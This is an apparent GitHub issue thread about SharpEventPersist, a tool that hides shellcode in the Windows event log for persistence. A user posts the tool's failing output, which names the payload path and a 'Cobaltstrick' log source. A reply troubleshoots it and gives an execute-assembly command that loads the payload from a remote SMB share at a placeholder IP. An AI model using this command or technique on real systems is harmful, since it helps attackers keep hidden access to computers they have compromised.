SharpEventPersist

hello,

Open ZHOUXINGXING9 opened this issue 2 years ago • 1 comments

Using shellcode: C:\Users\Administrator\Desktop\payload.bin
Setting event log instance id: 1337
Setting event log source to: Cobaltstrick
Setting event log to: Key Management Service
[-] Invoke_3 on EntryPoint failed.

Why?

ZHOUXINGXING9 • Aug 23 '22 07:08

Is the payload binary on the target at C:\Users\Administrator\Desktop\payload.bin? If not, it will fail because SharpEventPersist looks at the file path on the target it is running on.

If you want to host your payload remotely, you could do something like this:

execute-assembly /home/rbx/payload.bin -file \\<IP>\Share\payload.bin

Where the IP is an SMB server with your payload. I used Impacket's SMBserver for my testing and it worked well.


roobixx • Sep 12 '22 22:09